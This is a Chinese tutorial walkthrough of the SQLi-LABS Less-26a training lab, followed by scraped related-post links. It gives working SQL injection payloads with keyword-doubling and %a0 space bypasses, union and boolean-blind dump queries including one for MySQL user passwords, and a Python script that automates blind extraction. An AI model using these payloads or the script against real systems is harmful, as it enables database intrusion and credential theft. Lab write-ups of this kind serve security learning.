SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入;
后台过滤了关键字( and or ),注释(/* # -- /),空格;
这篇文章提供联合注入、布尔盲注、两种解题方式。
SQLi LABS其他关卡可以参考:SQLi-LABS 靶场通关教程
一、功能分析
这关是一个查询功能,地址栏输入id作为参数,后台根据id查询用户信息,并在页面回显出来。
二、思路分析
1)过滤绕过
- 针对注释(/* # -- /),可以使用引号闭合绕过。
- 针对关键字( and or ),可以使用双写绕过。
- 针对空格,可以使用 %a0 绕过。
2)注入方式
参数中携带单引号时,页面空显示,很明显是隐藏了报错信息,不适合报错注入。
?id=1,?id=2,页面显示的用户信息不同,说明页面会动态回显数据库查询到的信息,可以考虑联合注入。
?id=1,页面正常显示;?id=0,页面异常(空)显示;说明正确的参数和错误的参数分别对应两种不同的响应结果,可以考虑布尔盲注。
三、解题步骤
接下来,提供三种解题的方式:
方式一:联合注入
联合注入的详细使用方式,可以参考我的另一篇文章:
联合注入使用详解,原理+步骤+实战教程
第一步、判断注入点
地址栏输入:?id=1')anandd('1,页面正常显示
地址栏输入:?id=1')anandd('0,页面异常(空)显示
由此可以确定,注入点为:单引号+括号的字符型注入
第二步、判断显示位
地址栏输入:?id=0')union%a0select%a01,2,3%a0anandd('1
第三步、脱库
以当前使用的数据库为例,地址栏输入:
?id=0')union%a0select%a01,(database())
,3%a0anandd('
其余脱库操作时,将下面圈中的部分替换成SQL语句即可:
常用的脱库语句如下:
# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"# 获取数据库管理员用户密码
select%a0group_concat(user,passwoorrd)
from%a0mysql.user%a0where%a0user = "mituan"
方式二:布尔盲注
第一步、判断注入点
地址栏输入:?id=1')anandd('1,页面正常显示
地址栏输入:?id=1')anandd('0,页面异常(空)显示
第二步、判断长度
以当前使用的数据库为例,假设库名的长度大于1,地址栏输入:
?id=1')%a0anandd%a0length((database()))>1
%a0anandd('1
库名肯定大于1,所以页面正常显示,确定payload可用;
从1开始递增测试长度,稍后使用脚本测试。
第三步、枚举字符
截取库名的第一个字符,转换成ASCLL码,判断是否大于1,地址栏输入:
?id=1')%a0anandd%a0ascii(substr((database()),1,1))>1
%a0anandd('1
字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;
依次判断字符的ASCLL码是否等于(32~126);
枚举出第一个字符后,按照此方法枚举其他字符,为提高效率,稍后使用脚本枚举。
脱库
Python自动化猜解脚本如下,可按需修改:
import requests# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload# 目标网址(不带参数)
url = "http://2caf52448445428bb6107f7e6c0b67f4.app.mituan.zone/Less-26a/"
# 猜解长度使用的payload
payload_len = """?id=1')%a0anandd%a0length((database()))={n}
%a0anandd('1"""
# 枚举字符使用的payload
payload_str = """?id=1')%a0anandd%a0ascii(substr((database()),{l},1))={n}
%a0anandd('1"""# 获取长度
def getLength(url, payload):length = 1 # 初始测试长度为1while True:response = requests.get(url= url+payload_len.format(n= length))# 页面中出现此内容则表示成功if 'Your Login name' in response.text:print('测试长度完成,长度为:', length,)return length;else:print('正在测试长度:',length)length += 1 # 测试长度递增# 获取字符
def getStr(url, payload, length):str = '' # 初始表名/库名为空# 第一层循环,截取每一个字符for l in range(1, length+1):# 第二层循环,枚举截取字符的每一种可能性for n in range(33, 126):response = requests.get(url= url+payload_str.format(l= l, n= n))# print('我正在猜解', n)# 页面中出现此内容则表示成功if 'Your Login name' in response.text:str+= chr(n)print('第', l, '个字符猜解成功:', str)break;return str;# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)
执行结果是下面这样:
其余脱库操作时,将下面圈中的位置替换为SQL语句即可:
常用的脱库语句,请参考方式一末尾处(注意替换空格)。
SQLi LABS Less 26a 联合注入+布尔盲注相关推荐
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注
第25a关是数值型注入: 后台过滤了关键字(and.or),可以双写绕过: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. SQLi-LABS 其余关卡,可以参考我的专栏:SQLi-LABS ...
- SQLi LABS Less-13 报错注入+布尔盲注
第十三关是单引号+括号的字符型注入,推荐使用报错注入.布尔盲注. 目录 一.功能分析 二.思路分析 三.解题步骤 方式一:报错注入 第一步.判断注入点 第二步.判断报错条件 第三步.脱库 方式二.布尔 ...
- SQLi LABS Less-6 报错注入+布尔盲注
第六关是双引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1" 页面显示数据库的报错信 ...
- SQLi LABS Less-5 报错注入+布尔盲注
第五关是单引号字符型注入,推荐使用报错注入.布尔盲注 方式一:报错注入 推荐文章:报错注入使用详解,原理+步骤+实战教程 第一步.判断注入点 地址栏输入:?id=1' 单引号导致,页面显示数据库的报错 ...
- python实现sql宽字节注入+布尔盲注
目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...
- sql注入--布尔盲注
sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect param ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
最新文章
- SVN图标不能正常显示[转]
- 1.1 基本图像导入、处理和导出
- [mmu/cache]-Cache Type Register(CTR)寄存器介绍-InProgress
- RxJs Subject, AnonymousSubject, BehaviorSubject, ReplaySubject和AsyncSubject
- 3星|《增长黑客》:增长黑客是一个牵强的概念
- LINUX 文件夹打包
- DE21 Convolution Formula
- 在TextView中插入图片
- Linux下不停止服务,清空nohup.out文件
- 《逆袭进大厂》第二弹之C++进阶篇59问59答(超硬核干货)
- 在线式极限学习机OS-ELM
- html鼠标右键代码,Html鼠标右键菜单代码
- Win10禁用驱动签名,进入测试模式
- 直方图规定化(直方图匹配)
- 985计算机英语六级,大学英语六级比四级难多少?985学长含泪告诉你!
- 平板电脑装深度linux,在酷比魔方iWork10 Pro平板上装Deepin 20.1后触摸无反应的解决...
- 在线社交网络影响力分析——总结
- 该地发文,取得一级建造师等注册证书可直接考核认定高级工程师!
- nodejs+vue菜谱美食食谱网站系统
- 别树一帜的思维图软件:PersonalBrain(转)
热门文章
- Django的路由层
- 在Visual Studio 2017中找不到.NET Framework 4.6.2
- ListView的getFirstVisiblePosition等方法返回的是哪个对象
- 3-4笔刷的详细设定
- 获取客户端IP和MAC
- ASP.NET 常用的33种代码(转,收藏一下,以备后查)
- AndroidStudio_百度人脸识别离线SDK_代码分析_使用流程_随时更新---Android原生开发工作笔记217
- 大数据之-Hadoop之HDFS_HDFS的内容介绍---大数据之hadoop工作笔记0047
- Sharding-Sphere_分库分表小结和问题_Sharding-Sphere,Sharding-JDBC分布式_分库分表工作笔记005
- SpringCloud学习笔记008---杂七杂八002_spring 注解@Value详解_@Value(quot;#{}quot;)与@Value(quot;${}quot;)的区别